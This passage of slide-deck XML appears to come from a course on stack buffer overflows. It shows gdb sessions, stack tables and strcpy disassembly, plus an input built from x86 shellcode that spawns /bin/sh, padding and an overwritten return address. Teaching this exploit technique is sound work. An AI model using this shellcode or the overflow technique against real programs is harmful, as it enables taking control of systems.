              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>Continuing.Program</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> received signal SIGSEGV, Segmentation fault.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x66f6ffbf in ?? ()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>gdb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>r</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> `</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>python</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>print</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> '\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50\x53\x86\xe5\x89\xc2\x0b\x01\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>xcd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>\x80\x31\xc0\xb0\x01\x31\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>xdb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>xcd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>\x80' + 17 * '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>' + '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>bcde</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>' + '\x46\xf6\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>xff</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>xbf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>'"`</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{FCFB7E3C-6220-8942-988C-3F6E25750AD7}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>226</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="127640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dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xbffff714</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10000"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="344473">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x2</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10001"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="344473">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xb7e3faf3</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10002"/>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0x0</a:t>
                      </a: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r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xbffff861</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10007"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="344473">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xbffff646</a:t>
                      </a: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227</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Right Arrow 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="49075" y="35704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0xbffff67c</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="11" name="Table 10"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>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0xbffff646</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0xbffff63c</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0xbffff678</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a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="is-IS" sz="1800" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>8048415</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80482d0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>strcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a: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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>80483fd</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x80483fe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048400</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048403</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048406</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048409</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x804840b</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x804840f</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048412</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048415</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x804841a</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x804841f</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048420</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>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0xbffff678</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Right Arrow 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="121979" y="1729012"/>
            <a:ext cx="278606" cy="45719"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2"/>
          </a:solidFill>
          <a:ln w="635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solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="TextBox 13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2946820" y="338066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0xbffff63c</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="TextBox 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2940826" y="3038035"/>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0xbffff640</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="TextBox 15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2964404" y="25559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0xbffff646</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Right Arrow 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4747670" y="305359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 name="TextBox 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4224759" y="4641448"/>
            <a:ext cx="4838218" cy="1754326"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>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gdb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>) x/s 0xbffff861</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0xbffff861:	"1\300Phn/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>shh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>//bi\211\343PS\206\345\211\302\v\001̀1\300\260\001\061\333̀", 'a' &lt;repeats 17 times&gt;, "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>bcdeF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>\366\377\277"</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="706543644"/>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948796910"/>
              </p:ext>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dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xbffff714</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10000"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="344473">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x0</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10001"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="344473">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xbffff646</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10002"/>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r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xbffff861</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10007"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="344473">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xbffff646</a:t>
                      </a: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228</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Right Arrow 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="49075" y="35704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0xbffff67c</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="11" name="Table 10"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>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0xbffff646</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0xbffff63c</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0xbffff678</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a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="is-IS" sz="1800" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>804841a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80482d0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>strcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a: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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>80483fd</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
